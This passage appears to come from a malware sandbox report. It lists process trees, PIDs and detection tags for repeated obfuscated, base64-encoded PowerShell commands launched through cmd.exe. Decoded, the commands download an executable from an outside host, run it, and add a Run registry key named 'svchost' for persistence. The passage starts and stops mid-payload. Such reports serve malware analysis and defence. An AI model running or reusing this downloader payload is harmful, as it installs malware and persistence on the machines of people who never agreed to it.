QQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3948
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4104
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOw^ERShE^lL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBkAFEAQgAyAEEASABrAEEAYgBRAEIAeABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBlAEEAQgByAEEASABNAEEASQBBAEEAcABBAEMAQQBBAGUAdwBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAYgB3AEIAQwBBAEcAbwBBAFIAUQBCAGoAQQBGAFEAQQBJAEEAQgBUAEEARgBrAEEAVQB3AEIAMABBAEcAVQBBAGIAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEAQwA0AEEAVgB3AEIAbABBAEUASQBBAFkAdwBCAHMAQQBFAGsAQQBSAFEAQgBPAEEASABRAEEASwBRAEEAdQBBAEUAUQBBAGIAdwBCAFgAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEIARwBBAEUAawBBAFQAQQBCAGwAQQBDAGcAQQBJAEEAQQBrAEEASABVAEEAZABnAEIANQBBAEcAMABBAGMAUQBBAGcAQQBDAHcAQQBKAEEAQgA0AEEARwBzAEEAYwB3AEEAZwBBAEMAawBBAE8AdwBBAGcAQQBDAGcAQQBUAGcAQgBsAEEASABjAEEATABRAEIAUABBAEcASQBBAGEAZwBCAGwAQQBHAE0AQQBkAEEAQQBnAEEAQwAwAEEAWQB3AEIAdgBBAEcAMABBAEkAQQBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEATABnAEIAQgBBAEgAQQBBAGMAQQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEsAUQBBAHUAQQBGAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEIARgBBAEgAZwBBAFoAUQBCAGoAQQBIAFUAQQBkAEEAQgBsAEEAQwBnAEEASQBBAEEAawBBAEgAZwBBAGEAdwBCAHoAQQBDAEEAQQBLAFEAQQA3AEEASAAwAEEARABRAEEASwBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBJAEEAQQBnAEEAQwBRAEEAZABRAEIANgBBAEcAVQBBAGMAQQBCAHoAQQBHADAAQQBZAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEYAWQBBAE8AZwBCADEAQQBGAE0AQQBaAFEAQgBTAEEASABBAEEAVQBnAEIAdgBBAEUAWQBBAFMAUQBCAE0AQQBFAFUAQQBLAHcAQQBuAEEARgB3AEEAZAB3AEIAdgBBAEgASQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHEAQQBIAG8AQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgAxAEEASABBAEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEYAQQBBAGQAUQBCADAAQQBIAFEAQQBlAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAFUAQQBlAGcAQgBsAEEASABBAEEAYwB3AEIAdABBAEcARQBBAE8AdwBBAE4AQQBBAG8AQQBKAEEAQgB0AEEASABZAEEAWQBnAEIANQBBAEgASQBBAGMAQQBCAHgAQQBIAEUAQQBZAGcAQgBuAEEASABvAEEAYQBRAEEAZwBBAEQAMABBAEoAQQBCAGwAQQBFADQAQQBWAGcAQQA2AEEASABVAEEAVQB3AEIAbABBAEYASQBBAGMAQQBCAFMAQQBHADgAQQBSAGcAQgBKAEEARQB3AEEAUgBRAEEAcgBBAEMAYwBBAFgAQQBCADMAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAUwBRAEIAMABBAEcAVQBBAGIAUQBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBVAEEAYwBnAEIAMABBAEgAawBBAEkAQQBBAG4AQQBFAGcAQQBTAHcAQgBEAEEARgBVAEEATwBnAEIAYwBBAEYATQBBAGIAdwBCAG0AQQBIAFEAQQBkAHcAQgBoAEEASABJAEEAWgBRAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEUATQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAVgBnAEIAbABBAEgASQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBjAEEARgBJAEEAZABRAEIAdQBBAEMAYwBBAEkAQQBBAHQAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAbgBBAEgATQBBAGQAZwBCAGoAQQBHAGcAQQBiAHcAQgB6AEEASABRAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGgAQQBHAHcAQQBkAFEAQgBsAEEAQwBBAEEASgBBAEIAdABBAEgAWQBBAFkAZwBCADUAQQBIAEkAQQBjAEEAQgB4AEEASABFAEEAWQBnAEIAbgBBAEgAbwBBAGEAUQBBAGcAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAYwBBAEIAbABBAEgASQBBAGQAQQBCADUAQQBGAFEAQQBlAFEAQgB3AEEARwBVAEEASQBBAEEAbgBBAEYATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBjAEEASQBBAEEAdABBAEUAWQBBAGIAdwBCAHkAQQBHAE0AQQBaAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQBBAGQAQQBBAHQAQQBFADQAQQBkAFEAQgBzAEEARwB3AEEATwB3AEEATgBBAEEAbwBBAEkAQQBCADkAQQBHAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBACIAKQApAHwAaQBlAFgA
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOwERShElL -e WwBTAFkAcwBUAEUAbQAuAFQARQB4AFQALgBFAE4AQwBPAGQASQBOAEcAXQA6ADoAdQBuAEkAQwBPAGQARQAuAGcARQB0AFMAdAByAEkAbgBHACgAWwBTAHkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBlADYANABTAFQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBJAEEAYQBnAEIANgBBAEMA